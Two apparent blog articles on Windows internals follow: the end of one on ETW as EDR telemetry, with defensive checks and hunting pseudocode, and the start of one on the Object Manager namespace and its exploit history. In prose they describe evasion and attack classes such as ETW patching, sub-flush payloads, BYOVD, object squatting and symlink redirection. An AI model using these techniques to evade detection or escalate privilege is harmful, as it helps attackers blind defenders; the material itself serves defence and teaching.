"Events can be lost if any of the following conditions occur ... The total event size is greater than 64K ... The disk is too slow to keep up with the rate at which events are being generated. ... For real-time logging, the real-time consumer is not consuming events fast enough." -- [@ms-about-etw]

No ETW-only EDR can prevent a syscall whose payload completes inside one writer flush. EDRs that ship a kernel driver and register synchronous callbacks (CrowdStrike, SentinelOne, Sysmon, Elastic Defend) can deny operations through the PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] [@ms-pssetprocnotify] CreationStatus field; ETW-only EDRs cannot. ETW is observation, not enforcement.

Key idea: ETW is observation, not enforcement. The synchronous denial primitive on Windows belongs to kernel notify routines, not to ETW. Sub-microsecond payloads execute before the writer thread flushes; the layered defense stack of 2026 is an empirical bar, not a theoretical guarantee.

The VBS-backed code-integrity enforcement for kernel-mode code on Windows. With HVCI enabled, the hypervisor enforces that only signed kernel pages can execute. Closes the attack class that loads unsigned drivers; combined with the Vulnerable Driver Blocklist it closes most of the realistic BYOVD primitive surface as well.

The "events can be lost" enumeration in [@ms-about-etw] is the dispositive Microsoft acknowledgement of ETW's lossy substrate. SOC playbooks should treat ETW telemetry as best-effort, not as a guaranteed audit trail. Forensic claims that depend on completeness need an independent corroborating source.

Note: A detection-only EDR can alert on a malicious operation, but only after the operation has happened. By the time the SOC sees the alert, the syscall has completed, the shellcode has executed, the credentials have been stolen. This is why the kernel-callback path (with its ability to deny via CreationStatus) coexists with ETW even though ETW is more flexible: a SOC playbook needs both the speed of denial and the breadth of observation.

The 2026 layered stack -- Antimalware-PPL + EtwTi + HVCI + VBL -- raises the empirical bar enormously. It does not close the architectural gap. Sub-microsecond payloads still execute before the writer thread flushes. The BYOVD primitive on a non-HVCI box still defeats the kernel-callback layer. There are still problems the substrate cannot solve in principle.

Those are the limits we can describe. The next section is about the limits we cannot yet measure.

13. Open problems: keyword drift, secure kernel ETW, and the BYOVD arms race

The 2026 state of the art has five active open problems. Each has a partial workaround; none has a complete solution.

1. EtwTi keyword inventory drift across builds

Microsoft has not published a complete, current Microsoft-Windows-Threat-Intelligence keyword inventory. The community-maintained references -- the jdu2600 cross-build inventory [@gh-jdu2600] [@gh-jdu2600] and the repnz manifest archive [@gh-repnz] [@gh-repnz] -- are partial coverage and lag Microsoft's quarterly servicing cadence. EDR vendors that hard-code keyword bitmasks against an old build can silently miss events on newer builds because the keyword definitions have shifted underneath them. Detection engineers writing rules against KERNEL_THREATINT_TASK_* IDs that move between builds can get false negatives.

There are three plausible reasons, and Microsoft has not stated which (or which combination) is operative. *Operational secrecy*: a complete keyword inventory tells attackers exactly which syscall paths are observed and which are not, narrowing the search for evasion paths. *Documentation cost*: the inventory shifts every build, and maintaining a synchronised public reference is engineering work without an obvious internal champion. *Deliberate moving target*: keeping the public surface incomplete forces attackers to reverse-engineer per build, raising the cost of stable evasion. The community references partially defeat all three rationales; the absence remains.

2. Secure ETW (the `EtwSi*` family)

Windows VBS Trustlets run in the Secure Kernel (VTL1), insulated from the normal-world kernel (VTL0) by the hypervisor. The Secure Kernel exposes its own ETW family for VTL1 components; this is enumerated in fragments in Alex Ionescu's BlackHat 2015 deck on the Secure Kernel and in subsequent BlueHatIL talks. There is no public consumer-facing primary on EtwSi* in 2026. Cross-link: this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] [@paragmali-vbs-trustlets] covers the producer side of the story.

3. Forensic soundness of ETW telemetry

ETW is lossy by design (per the [@ms-about-etw] enumeration). Whether ETW-derived telemetry is forensically sound -- chain-of-custody complete, lossless under load, attestable as untampered between event emission and SIEM ingestion -- is an open question. Courts have not ruled. The current best partial result is to treat ETW as supporting evidence and require independent corroboration (file-system snapshots, network captures, OS state captures) for any claim that depends on completeness. Sysmon's Event ID 16 (Sysmon configuration changed) [@ms-sysmon] and the autologger registry write events on HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ are useful integrity signals: an attacker who silenced ETW typically leaves a footprint here.

4. The BYOVD arms race

The Vulnerable Driver Blocklist [@ms-vdb] [@ms-vdb] is hash-based and updated quarterly. The LOLDrivers project [@loldrivers] [@loldrivers] documents the public catalogue of known-vulnerable signed drivers. The gap between disclosure and blocklist update--as short as ~1 month via Patch Tuesday or up to a full quarter--is the residual exploitation window. The deeper structural issue is that the blocklist is hash-based; an attacker who finds a new vulnerability in a previously-trusted signed driver enjoys a fresh window every quarter. Closing this gap requires either a different trust model (allow-listing of known-good drivers, as Smart App Control does for executables) or behavioural detection of suspicious driver loads. Both are active areas of work.

5. Cross-process section-mapping coverage

EtwTi's KERNEL_THREATINT_TASK_MAPVIEW covers some but not all section-mapping primitives. The public fluxsec.red [@fluxsec-eti] inventory lists MAPVIEW_LOCAL and MAPVIEW_REMOTE keywords, but the underlying syscall set (NtMapViewOfSection, NtMapViewOfSectionEx, NtCreateSection, image-section vs file-section variants) is not exhaustively documented. Detection engineers who depend on full coverage of cross-process section mapping are working from an incomplete map.

What would a v2 ETW look like?

A theoretical ideal: synchronous kernel-emitted events on every security-relevant syscall, with the consumer running in VTL1 (Secure Kernel) so even a kernel-mode attacker in VTL0 cannot tamper with the consumer. The EtwSi* family is the partial realisation. The full ideal is incompatible with x64 syscall performance: synchronous notification on every syscall would dominate the cost of the syscall itself. The pragmatic answer Microsoft has been building toward is selective synchronous notification (the kernel notify routines for high-value control points) layered with broad asynchronous observation (ETW for everything else), with the most security-critical of the broad observations promoted to PPL/ELAM-gated kernel-emitted producers (EtwTi). Two decades of layering, no single architectural endpoint.For the producer side of the Secure Kernel ETW story (EtwSi*), see this article's companion piece on VBS Trustlets [@paragmali-vbs-trustlets] [@paragmali-vbs-trustlets] in the same series. The Trustlet-side architecture is a separate topic large enough to need its own walkthrough.

Open problems are interesting but they are not actionable. The next section is about what an engineer can do on Monday morning.

14. Practical guide: five things to do Monday morning

You have read 12,000 words about ETW. Here are five concrete checks an engineer can run on a Windows host this morning.

Note: logman query providers enumerates every registered provider on the host. Cross-reference the output against the section 8 catalogue and flag any security-relevant provider your EDR is not consuming. Pay specific attention to Microsoft-Antimalware-Scan-Interface, Microsoft-Windows-PowerShell, Microsoft-Windows-DotNETRuntime, and Microsoft-Windows-Sysmon if Sysmon is installed. Missing coverage of any of these on a host you are responsible for is a detection-coverage gap, not a configuration issue.

Note: Run wevtutil gp Microsoft-Windows-Threat-Intelligence to confirm the provider is registered and inspect its keyword definitions. Then check whether your EDR is actually a consumer: walk the live-debugger handle enumeration in Yarden Shafir's Trail of Bits post [@trailofbits-shafir] [@trailofbits-shafir] (the WinDbg JS scripts are linked from the post). If your EDR is supposed to be ELAM-onboarded but does not appear in the consumer enumeration for an EtwTi logger session, your installation may have lost the gate. This is the difference between a configured EDR and a functional EDR.

Note: Enumerate HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ for unauthorised session entries. Per the Palantir CIRT taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback], this is the persistent-tampering surface. A baseline audit should produce a known list of expected sessions (Defender, your EDR, Sysmon if installed, the standard Windows diagnostic listeners). Any subkey not on the baseline list is an investigation candidate. Sysmon Event ID 13 (registry value set) [@ms-sysmon] on this subtree is a high-signal alert in any SIEM.

Note: Run Get-CimInstance Win32_DeviceGuard | Select-Object SecurityServicesConfigured, SecurityServicesRunning, VirtualizationBasedSecurityStatus to expose whether HVCI and the Vulnerable Driver Blocklist are active. Per the Microsoft Learn primary [@ms-vdb] [@ms-vdb], the BYOVD ceiling is your kernel-tampering integrity guarantee. If VBS is Off on a managed endpoint, your detection coverage is structurally weaker than it should be on supported hardware. Treat it as a hardening item, not a nice-to-have.

Note: Write a hunting query for the pattern: "process X registers as ETW consumer for Microsoft-Windows-Threat-Intelligence and X is not on the EDR allow-list." The provider's PPL+ELAM gate makes this a high-signal alert: only a signed Antimalware-PPL service can pass the gate, so an unexpected process holding an EtwConsumer handle to the TI logger ID is either a misconfigured tool, a legitimate research session you forgot about, or an attacker chain that has acquired Antimalware-PPL trust on your fleet. The first two are quick to triage; the third is an incident.

The structure of the check in pseudocode -- mirroring the WinDbg JS approach in [@trailofbits-shafir]:

{` // Pseudocode: inventory providers and identify EtwTi consumers.

// 1. Enumerate registered providers and find Microsoft-Windows-Threat-Intelligence. const providers = enumerateRegisteredProviders(); const tiProvider = providers.find(p => p.guid === "{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}"); if (!tiProvider) { warn("EtwTi provider not registered on this host"); }

// 2. Enumerate live trace sessions and find any that subscribe to TI. const sessions = enumerateLoggerSessions(); // logman query -ets equivalent const tiSessions = sessions.filter(s => s.providers.some(p => p.guid === tiProvider?.guid));

// 3. Walk EtwConsumer handles for each TI session; identify the consuming processes. const expectedConsumers = ["MsMpEng.exe", "CSFalconService.exe", "SentinelAgent.exe"]; for (const session of tiSessions) { const consumers = enumerateEtwConsumers(session.loggerId); // Shafir WinDbg JS for (const consumer of consumers) { if (!expectedConsumers.includes(consumer.processName)) { alert(`Unexpected EtwTi consumer: ${consumer.processName} (PID ${consumer.pid})`); } } }

// 4. Audit autologger persistence entries against a known baseline. const baseline = loadAutologgerBaseline(); const live = enumerateAutologgerSubkeys(); // HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger for (const entry of live) { if (!baseline.includes(entry.name)) { alert(`Unexpected autologger entry: ${entry.name}`); } } `}

With those five checks, the catalogue is no longer an abstraction. You have an inventory of what your host emits, an inventory of who consumes the most security-critical provider, an audit of the persistence surface that defines what gets emitted at all, a confirmation of the integrity layer that closes BYOVD, and a hunt for anyone who has somehow obtained the passport. Now we close with the questions every reader should expect to have.

15. Frequently asked questions

Yes, for *publication*. Sysmon's kernel driver `SysmonDrv.sys` registers `PsSetCreateProcessNotifyRoutineEx` and the related thread- and image-load callbacks; the user-mode service then publishes the resulting events via its own `Microsoft-Windows-Sysmon` ETW provider GUID `{5770385F-C22A-43E0-BF4C-06F5698FFBD9}` [@ms-sysmon]. It does not consume the public catalogue providers via ETW for its kernel-event hot path; the kernel taps come straight from the callback API. This callback-then-publish architecture is why Sysmon's events are universally consumable by SIEM forwarders and downstream tools. Because Defender consumes `Microsoft-Windows-Threat-Intelligence`, which fires from the kernel side of memory-modifying syscalls, not from the user-mode `ntdll!EtwEventWrite` trampoline. The fluxsec.red walkthrough states the asymmetry verbatim: "we cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself" [@fluxsec-eti]. The Adam Chester 2020 patch silences user-mode providers (like `Microsoft-Windows-DotNETRuntime`) for the patched process; it cannot silence kernel-emitted providers for any process. Defender's load-bearing security signal is structurally out of reach of the user-mode patch class. No. The provider's security descriptor admits only Antimalware-PPL signers loaded by an ELAM driver. A non-PPL `EnableTraceEx2` call against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the Microsoft Learn primary on EnableTraceEx2 [@ms-enabletraceex2] [@ms-enabletraceex2] documents the error code for insufficient-privilege callers; the PPL-specific gate that triggers it for EtwTi is described in [@fluxsec-eti]). The gate exists because an attacker who could trivially become an EtwTi consumer would have direct visibility into the kernel's view of every memory-modifying syscall on the host -- exactly the inventory needed to evade everything else. Schema location. Manifest-based providers ship an out-of-band XML manifest registered with `wevtutil im`; consumers decode events against the system-installed manifest using TDH. TraceLogging providers carry the schema *inline* in each event payload as type-length-value triples; consumers decode without any registered manifest. TraceLogging events are larger because the schema bytes ride in the payload; manifest events have a smaller per-event size at the cost of installation friction. Both inherit the eight-session cap [@ms-about-etw], [@ms-tracelogging-about]. Sixty-four globally per [@ms-etw-sessions], with Windows 2000 limited to 32. Per-provider, manifest-based and TraceLogging providers admit up to 8 simultaneous sessions; classic and WPP providers admit only 1 [@ms-about-etw], [@ms-etw-config]. The runtime symptom of the per-provider 8-session cap binding is `ERROR_NO_SYSTEM_RESOURCES` from `EnableTraceEx2` [@ms-enabletraceex2]; the runtime symptom of the global 64-session cap binding is the same error from `StartTrace`. No. EventPipe is a managed-runtime cross-platform analogue to ETW that shipped in .NET Core 3.0 (September 2019) and remains available in every later release including .NET 5+. It runs on Linux and macOS as well as Windows. On Windows, the kernel-mode providers and the EtwTi security substrate have no EventPipe equivalent; EventPipe is a complement to ETW for managed workloads, not a replacement. The Windows EDR substrate remains ETW; managed-runtime tracing has acquired an additional cross-platform path that does not displace it.

ETW is now twenty-six years old. It started as a performance facility for Windows 2000 driver authors who could not afford DbgPrint on production servers, and it became the substrate of every major Windows endpoint security product through a decade of unintended consequences. The Vista team that raised the per-provider session cap from 1 to 8 was thinking about ergonomics. The Windows 8.1 team that introduced Antimalware-PPL was thinking about Defender's hardening, not about future third-party EDRs. The team that shipped EtwTi in the Windows 10 RS-era understood the security stakes precisely. By 2026 those three decisions, taken in three different Microsoft contexts a decade apart, are the architecture of detection on the Windows endpoint -- and the reason the operator in the section 1 hook scene loses the round even when the patch works exactly as it should.

The Object Manager Namespace: The Hierarchical Filesystem Underneath Every Windows Security Boundary

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

**The Windows Object Manager namespace is the kernel-resident, filesystem-shaped tree that every Windows security boundary quietly assumes.** Every named kernel object -- processes, threads, sections, files, registry keys, tokens, mutants, semaphores, ALPC ports, devices, drivers, jobs, silos -- lives somewhere under `\`. Six generations of isolation primitives (Session 0 isolation, AppContainer lowbox, integrity levels, VBS trustlets, Server Silos, and the `ObRegisterCallbacks` EDR sensor surface) are all path rewrites, per-directory ACLs, or kernel callbacks layered on the same 1993 Cutler-era four-piece structure. This article builds the namespace bottom-up -- `OBJECT_HEADER`, `OBJECT_TYPE`, `ParseProcedure`, `OBJECT_DIRECTORY` -- walks the 2026 top-level directory atlas on Windows 11 25H2, surveys the exploit tradition (symbolic-link redirection, namespace squatting, bait-and-switch on `\??` and `\Device`, arbitrary directory creation), and closes on the EDR pivot in `ObRegisterCallbacks`.

1. The path that isn't a path

Open WinObj.exe as administrator on any Windows 11 25H2 machine (Windows 11 version history). For about ten seconds the screen looks like a filesystem. The root is named \. Below it sit folders called \Device, \BaseNamedObjects, \Sessions, \RPC Control, \KnownDlls, and \ObjectTypes. Double-click any of them and you see children. Right-click any node and you can read a security descriptor. This is essentially the same UI a 1996 SysAdmin would have recognised; the tool first shipped that year as part of Mark Russinovich and Bryce Cogswell's Winternals [@en-wikipedia-mark-russinovich], and the current build is a Microsoft-signed Sysinternals binary whose navigation surface has not been redesigned in three decades [@ms-winobj].

Navigate to \Sessions\1\AppContainerNamedObjects and the picture starts to fracture. Inside that directory you will find one subdirectory per running AppContainer-sandboxed app, each named after a long Security Identifier of the form S-1-15-2-.... Pick the one belonging to the Microsoft Edge renderer process you are reading this article in. Every named mutant, event, section, semaphore, and ALPC port the renderer can ever name lives inside that one subdirectory. The renderer cannot escape it. Not because of a permission check that comes second, but because the kernel rewrites every name the renderer asks for, transparently, before path resolution begins. Microsoft's AppContainer Isolation documentation [@ms-appcontainer-isolation] calls this "sandboxing the application kernel objects."

This tree is not a filesystem. There is no disk persistence; nothing under \ survives a reboot. It is not the Windows registry either; the registry is a separate subsystem with its own hive format that hangs off the namespace only through a parse procedure on the Key object type. What this tree is, instead, is the Object Manager namespace: the in-memory, kernel-resident, hierarchical name service that the Windows kernel uses to locate every nameable kernel object [@ms-managing-kernel-objects]. Its top-level directories are catalogued in the driver kit's Object Directories reference [@ms-object-directories].

The Windows Object Manager, internally called `Ob`, is a kernel-mode subsystem of the Windows Executive that manages the lifetime, naming, security, and accounting of every resource the kernel exposes to user mode as a named object. Wikipedia summarises it as a "subsystem implemented as part of the Windows Executive which manages Windows resources... each [resource] reside[s] in a namespace for categorization" [@en-wikipedia-object-manager].

Here is the thesis the rest of this article spends nine thousand words unpacking. Every Windows security boundary you have read about -- Session 0 isolation, Mandatory Integrity Control, AppContainer, the Virtualization-Based Security trustlets, Server Silos and Windows containers, the EDR sensor surface that fires when something opens a handle to lsass.exe -- is physically realised in this tree. Each boundary is either a path rewrite at lookup time, a per-directory ACL, a token-keyed name substitution, or a kernel callback registered against an OBJECT_TYPE. The boundaries you read about elsewhere are the policies; this tree is the mechanism.

The Object Manager has shipped without architectural change for thirty-three years. Whose decision was that? And why did a 1993 data structure survive untouched while the GUI, the driver model, the security subsystem, and the boot path around it were rewritten more than once?

2. Where the namespace came from

The decision belongs to Dave Cutler. In 1988 Microsoft hired Cutler away from Digital Equipment Corporation. The Wikipedia biography records the line of operating systems Cutler had developed at DEC: "RSX-11M, VAXELN, VMS, and MICA" [@en-wikipedia-dave-cutler]. Three of those shipped commercially; the fourth, MICA, was cancelled with the Prism RISC program. Cutler walked out, and Microsoft signed him with a charter from Bill Gates to build a portable next-generation kernel that could host the existing Windows API on top of a 32-bit, multi-architecture base [@en-wikipedia-architecture-of-windows-nt]. Cutler brought a small team of DEC veterans with him.

The Object Manager is one of that team's earliest design decisions. The architectural bet was to unify every named kernel object under one filesystem-shaped tree, with each type carrying a parse procedure so a single family of syscalls (NtCreateFile, NtOpenSection, NtOpenProcess, and so on) could address files, registry keys, processes, ports, sections, drivers, devices, jobs, and synchronization primitives using the same path-walk algorithm. That was an unusual choice in 1989. VMS had a more typed, less unified resource broker. Mach treated kernel objects as capability-style port rights and never gave them a hierarchical name. Cutler's choice was, at heart, a Plan-9-style "every named resource is a filesystem path" idea, imported into a Windows shell.Plan 9 from Bell Labs (Pike, Thompson, et al.) was the academic articulation of the "everything is a path" property: every kernel-named resource, including processes and network connections, surfaced as a file under a 9P-served namespace. Plan 9 never reached commercial scale, but its design idea reached production through NT, and through Linux's /proc, /sys, and FUSE.

Windows NT 3.1 shipped on July 27, 1993. It was "Microsoft's first 32-bit operating system," supported on IA-32, DEC Alpha, and MIPS [@en-wikipedia-windows-nt-3-1]. The Object Manager was already one of its executive subsystems, sitting alongside the I/O Manager, the Memory Manager, the Process Manager, the Security Reference Monitor, and the Local Procedure Call subsystem [@en-wikipedia-architecture-of-windows-nt]. The four pieces this article will rebuild from scratch -- the OBJECT_HEADER that prefixes every object in memory, the OBJECT_TYPE singleton that owns each type's method table, the ParseProcedure that delegates path resolution to the owning subsystem, and the OBJECT_DIRECTORY hash table that maps names to objects -- were all in the NT 3.1 kernel. None of them has been rearchitected since.

That same year, Microsoft Press published Inside Windows NT, written by technical writer Helen Custer with a Foreword by Cutler himself. The book's Object Manager chapter is the canonical pre-2000 description of the namespace, cited on the Sysinternals WinObj page [@ms-winobj] as "Helen Custer's Inside Windows NT provides a good overview of the Object Manager namespace." Custer's book has been out of print for two decades, but the citation chain through Russinovich's tool is durable.

Three years later, in 1996, Russinovich and Cogswell co-founded Winternals and released WinObj 1.0 [@en-wikipedia-mark-russinovich]. WinObj was the first publicly distributed tool to walk \ from user mode, using the native NtOpenDirectoryObject and NtQueryDirectoryObject syscalls that the Object Manager exposed through NTDLL [@ms-winobj]. The following year, Russinovich's October 1997 Windows IT Pro column "Inside the Object Manager" gave the namespace its first treatment in the trade press. The original URL did not survive changes to TechTarget's web property portfolio in 2025 (TechTarget was acquired by Informa PLC in 2025), but the WinObj page still cites the column by name as "Mark's October 1997 [WindowsITPro Magazine] column, 'Inside the Object Manager'."The Russinovich 1997 column has no surviving direct URL because the URL did not survive changes to TechTarget's web property portfolio in 2025. The most accessible surviving citation is through the WinObj page itself. The same archive failure also explains why Helen Custer's 1993 biography returns HTTP 404 on Wikipedia in 2026; the book (ISBN 1-55615-481-X) survives in used-book channels only.

The line of book-length internals references that began with Custer continued through Inside Windows 2000 (third edition) and the Windows Internals series that succeeded it. The 7th edition Part 1 was published by Microsoft Press in May 2017, authored by Russinovich, Alex Ionescu, and David A. Solomon [@microsoftpressstore-wininternals7-part1]; its Chapter 8 is the current canonical reference for the Object Manager. James Forshaw's April 2024 Windows Security Internals [@nostarch-windows-security-internals] is the contemporary companion that ties the namespace into the access-check pipeline.

The 1993 design assumed a single global namespace. One process tree, one \BaseNamedObjects, one \Windows\WindowStations\WinSta0, one \?? view of DOS device letters. Everyone shared everything. Did that assumption survive the Internet?

3. The pre-Vista namespace and how it broke

It did not. By the late 1990s every interactive Windows user was sharing a name service with every running service. The single-global-namespace assumption produced three distinct exploit classes, each rediscovered repeatedly between 1996 and 2007, and each ultimately closed only by architectural change.

The most public failure was the shatter attack. In August 2002 a researcher named Chris Paget published a paper titled "Exploiting design flaws in the Win32 API for privilege escalation." Wikipedia's article on the disclosure preserves the chronology: "Shatter attacks became a topic of intense conversation in the security community in August 2002 after the publication of Chris Paget's paper" [@en-wikipedia-shatter-attack]. The proof-of-concept was about thirty lines. As an unprivileged interactive user, Paget sent a WM_TIMER window message to a service's hidden window in the same \Windows\WindowStations\WinSta0 (which all services and all interactive users shared in pre-Vista Windows), with a callback parameter pointing to attacker-placed shellcode. The shellcode ran as SYSTEM.

Microsoft's initial response, preserved in the Wikipedia article, was that "the flaw lies in the specific, highly privileged service": a per-service bug, patch the services. That stance did not survive the structural-class argument. The exploit was not a bug in one service. It was a property of the namespace: as long as services and users shared a window station and a \BaseNamedObjects, any service that ever called a Windows API processing a message from its message queue was reachable from any logged-in user.

Note: A second class of pre-Vista failure was named-object squatting. A low-privilege user pre-creates \BaseNamedObjects\Some_Global_Event with a permissive DACL. A privileged service later calls CreateEvent("Some_Global_Event") with default open-or-create semantics and ends up inheriting the squatter's object, security descriptor and all. This is not one service-author's bug; it is the consequence of every service-author trusting that names in a shared namespace would resolve to objects they themselves created. The pattern has been rediscovered approximately once a year for two decades. James Forshaw documents the contemporary named-pipe analog in his 2017 "Named Pipe Secure Prefixes" post [@tiraniddo-named-pipe-secure-prefixes], where the SMSS-created prefixes \Device\NamedPipe\ProtectedPrefix\Administrators, \Device\NamedPipe\ProtectedPrefix\LocalService, and \Device\NamedPipe\ProtectedPrefix\NetworkService are TCB-privilege-gated -- only smss.exe can create sibling protected prefixes, so a service that publishes its pipe below one of these prefixes inherits a DACL that low-privilege squatters cannot reach.

The third class was symbolic-link redirection. The pre-Vista Object Manager exposed two kinds of user-creatable symbolic link: object-manager symbolic links inside \?? (the per-session DOS-devices view) and NTFS mount points on disk. The attack pattern was the same in both. A privileged process is asked to open a path the user controls part of. The user has pre-planted a symbolic link partway through the path that redirects the residual walk into a target the user could not otherwise write. The privileged process opens the redirected file and treats it as if it were the original.

Forshaw's 2015 Project Zero post on the symbolic-link hardening generation is the canonical taxonomy: "There are three types of symbolic links you can access from a low privileged user, Object Manager Symbolic Links, Registry Key Symbolic Links and NTFS Mount Points" [@p0-symlink-mitigations]. His worked example for the Internet Explorer 11 EPM sandbox is CVE-2015-0055 [@nvd-cve-2015-0055], described in the post as "an information disclosure issue in the IE EPM sandbox which abused symbolic links to bypass a security check."

The aha moment from this section is the one Microsoft eventually conceded. The pre-Vista failure mode was not three independent bug families. It was one structural problem -- a single global namespace shared by every principal -- with three faces. No amount of per-service patching could close it. The fix had to be architectural: the namespace itself had to be partitioned.The Interactive Services Detection Service (ISDS) was Vista's backward-compatibility hack for legacy services that drew GUIs into Session 0. ISDS displayed a "An interactive service has requested attention" prompt that let the user switch to Session 0 long enough to dismiss the dialog. It was deprecated in Windows 10 1803 and is the historical artifact of just how much pre-Vista code assumed services and users would share a window station.

That fix took five years to ship. Windows Vista RTM was released on November 8, 2006 and General Availability arrived on January 30, 2007 [@en-wikipedia-windows-vista]. Vista did not ship one fix; it shipped three independent partition mechanisms in the same release window, because the structural failure had three faces and each face needed its own mechanism. The next section catalogues those mechanisms and the four additional generations of additive isolation that have built on them since.

4. Six generations of namespace isolation

The namespace itself has not been rearchitected since 1993. What has evolved, in six discrete generations between 1993 and 2026, is the set of partition primitives layered on top: the mechanisms that let the kernel hide subtrees from particular callers, rewrite paths transparently for particular tokens, or invoke a registered watcher when a particular handle is created. Each generation closes a structural class. None has rendered its predecessor obsolete. On 2026 Windows 11 25H2 all six are simultaneously load-bearing.

flowchart LR G1["Gen 1
NT 3.1, Jul 1993
Single global namespace"] --> G2 G2["Gen 2
Vista, Jan 2007 / SP1, Feb 2008
Session 0 + MIC + ObRegisterCallbacks"] --> G3 G3["Gen 3
Windows 8, Oct 2012
AppContainer / Lowbox / per-package directory"] --> G4 G4["Gen 4
Windows 10 RTM, Jul 2015
VBS / IUM secure-kernel namespace"] --> G5 G5["Gen 5
Windows Server 2016, Oct 2016
Server Silos / silo-scoped views"] --> G6 G6["Gen 6
MS15-090, Aug 2015 ->
symbolic-link class hardening"]

Generation numbering is thematic (by isolation capability introduced) rather than strictly chronological. Gen 6 (MS15-090, August 11, 2015) predates Gen 5 (Windows Server 2016, October 12, 2016) by 14 months; the numbering reflects the logical layering of isolation mechanisms, not their calendar sequence.

4.1 Generation 2 -- Session 0 isolation, integrity levels, ObRegisterCallbacks

Vista shipped three mechanisms in one release window because the structural failure had three faces.

The first was Session 0 isolation. From Vista forward, services run in Session 0 alone; the first interactive logon starts at Session 1. Each session gets its own subtree at \Sessions\<n>\BaseNamedObjects, \Sessions\<n>\Windows\WindowStations, and \Sessions\<n>\DosDevices. The Win32 Local\ prefix routes through kernel32!BaseGetNamedObjectDirectory into the per-session BNO; Global\ routes into the shared \BaseNamedObjects [@ms-termserv-kernel-object-namespaces]. The Wikipedia Shatter article preserves the architectural fix verbatim: "Local user logins were moved from Session 0 to Session 1, thus separating the user's processes from system services that could be vulnerable" [@en-wikipedia-shatter-attack]. After Vista an interactive user could no longer SendMessage(WM_TIMER) into a service's hidden window because the user and the service no longer shared a window station.

The second mechanism was Mandatory Integrity Control. Vista introduced a new ACE type, SYSTEM_MANDATORY_LABEL_ACE, attached to every object's security descriptor. Each token carries one of four integrity levels (Low S-1-16-4096, Medium S-1-16-8192, High S-1-16-12288, or System S-1-16-16384), and the Security Reference Monitor compares the requester's level against the object's level after path resolution succeeds [@en-wikipedia-mandatory-integrity-control]. MIC is not a namespace partition. A Low-IL process and a Medium-IL process resolve the same \BaseNamedObjects directory; only the open is denied at the leaf. The structural property MIC adds is that the leaf check is unbypassable from user mode; the check fires regardless of which DACL the object carries.

The third mechanism was ObRegisterCallbacks. Microsoft's wdm.h documentation records the API's first ship date verbatim: "Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008" [@ms-obregistercallbacks]. The API lets a KMCS-signed driver intercept handle creation and handle duplication on PsProcessType, PsThreadType, and the desktop object type. The registration carries an Altitude (a FltMgr-style collision key) and an array of OB_OPERATION_REGISTRATION records [@ms-ob-callback-registration]. Pre-operation callbacks can strip access-mask bits before the handle is granted; post-operation callbacks fire for logging. The parallel API PsSetCreateProcessNotifyRoutineEx [@ms-pssetcreateprocessnotifyroutineex] covers process creation. Together, these are the kernel-mode primitives every modern EDR product depends on; they ship inside the Object Manager itself and they are the reason an EDR knows when something opens a handle to lsass.exe.

4.2 Generation 3 -- AppContainer and the lowbox token

Windows 8 shipped on October 26, 2012 [@en-wikipedia-windows-8]. Modern / UWP apps downloaded from the Microsoft Store needed a sandbox finer-grained than per-session BNO. The Vista path rewriting in kernel32!BaseGetNamedObjectDirectory happened in user mode, which made it the wrong layer for a sandbox: a hostile renderer could in principle bypass the user-mode rewrite. The new layer moved into the kernel.

Each UWP / MSIX process runs under a special token type, the AppContainer / LowBox token (referred to in kernel code as the lowbox token), created by NtCreateLowBoxToken. The token carries a TOKEN_APPCONTAINER_INFORMATION block that names the process's package SID (S-1-15-2-...) and an AppContainerNumber. Inside ObpLookupObjectName, before the path is walked, the kernel checks whether the caller's token is a lowbox token; if it is, lookups of \BaseNamedObjects\X, \RPC Control\X, and other rewriteable paths get redirected into \Sessions\<n>\AppContainerNamedObjects\<package-sid>\X. The user-mode caller never sees the rewrite. The package-SID directory is created by SYSTEM at process-creation time with a security descriptor that grants the package SID, and only the package SID, full access. Microsoft's wording is precise: AppContainer works by "sandboxing the application kernel objects, the AppContainer environment prevents the application from influencing, or being influenced by, other application processes" [@ms-appcontainer-isolation].

The AppInfo service, which is responsible for creating the new application, calls the undocumented API CreateAppContainerToken to do some internal housekeeping. Unfortunately this API creates object directories under the user's AppContainerNamedObjects object directory to support redirecting BaseNamedObjects and RPC endpoints by the OS. -- James Forshaw, Project Zero Issue 1550 [@p0-issue1550]

The residual class the AppContainer model has not closed is the one Forshaw's August 30, 2018 Project Zero post [@p0-issue1550] documents: because the SYSTEM-side AppInfo service has to write into the user's AppContainerNamedObjects subtree to set up redirection, an unprivileged caller can race the directory creation and end up planting a symbolic link the SYSTEM service then follows. The class -- "SYSTEM-privileged directory creation in user-controllable territory" -- is the worked example of why "the kernel rewrites the name" is an isolation property only when the SYSTEM helpers also use the rewrite.

4.3 Generation 4 -- VBS trustlets and the IUM secure-kernel namespace

Windows 10 RTM shipped on July 29, 2015 [@en-wikipedia-windows-10-version-history]. The Virtualization-Based Security (VBS) feature set introduced a parallel object-manager-shaped namespace that lives in Virtual Trust Level 1 (VTL1) and is inaccessible to the VTL0 NT kernel. Inside VTL1 the Secure Kernel (securekernel.exe) maintains its own root, its own type registry, and its own handle-table machinery. The VTL0 NT kernel can see trustlet processes -- the per-trustlet user-mode containers running in Isolated User Mode (IUM) -- but it cannot reach into their secure-side state.

Alex Ionescu's Black Hat USA 2015 talk Battle of SKM and IUM [@ionescu-bh2015-pdf] is the canonical inventory of the inbox Trustlet IDs at ship: Trustlet 0 is the Secure Kernel Process hosting Device Guard; Trustlet 1 is LSAISO.EXE for Credential Guard; Trustlet 2 is VMSP.EXE hosting the virtual TPM; Trustlet 3 is the vTPM provisioning trustlet. Each is identified by a Trustlet ID and reachable only through narrow Secure Kernel ALPC ports. The VBS Trustlets piece in this series unpacks the threat model.

4.4 Generation 5 -- Server Silos and the silo-scoped namespace

